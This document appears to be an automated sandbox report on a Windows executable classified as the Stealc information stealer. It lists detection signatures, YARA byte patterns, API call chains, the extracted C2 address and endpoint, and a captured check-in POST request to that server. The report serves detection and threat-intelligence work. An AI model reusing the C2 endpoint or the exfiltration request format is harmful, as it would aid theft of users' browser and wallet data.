Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oqIz1tfl5h.exe

Overview

General Information

Sample name:oqIz1tfl5h.exe
renamed because original name is a hash value
Original sample name:085de763171fbbafeac2cdb972aacc2a.exe
Analysis ID:1542868
MD5:085de763171fbbafeac2cdb972aacc2a
SHA1:e4762c69c5d84e56fb386fac56015d3f58351f9b
SHA256:dd4a5efc48bbd0ed6ad6aab7220cab9f5bf0ff1fd47f5594ba67ae122cbf026f
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • oqIz1tfl5h.exe (PID: 4828 cmdline: "C:\Users\user\Desktop\oqIz1tfl5h.exe" MD5: 085DE763171FBBAFEAC2CDB972AACC2A)
    • WerFault.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1308 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1208:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          6.3.oqIz1tfl5h.exe.3070000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            6.2.oqIz1tfl5h.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              6.2.oqIz1tfl5h.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                6.2.oqIz1tfl5h.exe.3020e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  6.3.oqIz1tfl5h.exe.3070000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T19:03:11.474753+020020442431Malware Command and Control Activity Detected192.168.2.74970562.204.41.17780TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: oqIz1tfl5h.exeAvira: detected
                    Source: 00000006.00000003.1336754852.0000000003070000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                    Source: oqIz1tfl5h.exeReversingLabs: Detection: 34%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: oqIz1tfl5h.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,6_2_0040C820
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,6_2_00407240
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,6_2_00409AC0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,6_2_00418EA0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,6_2_00409B60
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,6_2_0302CA87
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03039107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,6_2_03039107
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03029D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,6_2_03029D27
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03029DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,6_2_03029DC7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_030274A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,6_2_030274A7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeUnpacked PE file: 6.2.oqIz1tfl5h.exe.400000.1.unpack
                    Source: oqIz1tfl5h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,6_2_0040E430
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,6_2_004138B0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,6_2_00414570
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_00414910
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,6_2_0040ED20
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,6_2_0040BE70
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0040DE10
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_004016D0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,6_2_0040DA80
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,6_2_00413EA0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0040F6B0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03033B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,6_2_03033B17
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03034B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_03034B77
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,6_2_0302EF87
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_030347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,6_2_030347D7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,6_2_0302E697
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03034107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,6_2_03034107
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0302F917
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03021937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_03021937
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0302E077
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,6_2_0302C0D7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,6_2_0302DCE7

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49705 -> 62.204.41.177:80
                    Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 36 30 38 35 37 41 46 34 45 44 31 32 35 33 31 33 31 38 31 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="hwid"BA60857AF4ED1253131813------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="build"default9_cap------DGIJDAFCFHIEHJJKEHJK--
                    Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,6_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 36 30 38 35 37 41 46 34 45 44 31 32 35 33 31 33 31 38 31 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="hwid"BA60857AF4ED1253131813------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="build"default9_cap------DGIJDAFCFHIEHJJKEHJK--
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, oqIz1tfl5h.exe, 00000006.00000002.1600926236.0000000002DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/5PIX:
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php4
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php8
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpT
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpsktop
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phptBWX
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php~
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                    Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1308
                    Source: oqIz1tfl5h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: oqIz1tfl5h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,6_2_00419600
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,6_2_00413720
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\5LJB5S90.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\086178e6-d802-4c1c-9165-8f8679760cf7Jump to behavior
                    Source: oqIz1tfl5h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: oqIz1tfl5h.exeReversingLabs: Detection: 34%
                    Source: unknownProcess created: C:\Users\user\Desktop\oqIz1tfl5h.exe "C:\Users\user\Desktop\oqIz1tfl5h.exe"
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1308
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeUnpacked PE file: 6.2.oqIz1tfl5h.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.weririt:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeUnpacked PE file: 6.2.oqIz1tfl5h.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00419860
                    Source: oqIz1tfl5h.exeStatic PE information: section name: .weririt
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0041B035 push ecx; ret 6_2_0041B048
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040020D pushfd ; iretd 6_2_00400211
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_02DFC843 push 7DD07DC0h; iretd 6_2_02DFC854
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_02DFF813 push eax; ret 6_2_02DFF831
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_02DFF822 push eax; ret 6_2_02DFF831
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_02DFBD3D pushfd ; iretd 6_2_02DFBD40
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03020F59 pushfd ; iretd 6_2_03021078
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0303B29C push ecx; ret 6_2_0303B2AF
                    Source: oqIz1tfl5h.exeStatic PE information: section name: .text entropy: 7.4826108141905285
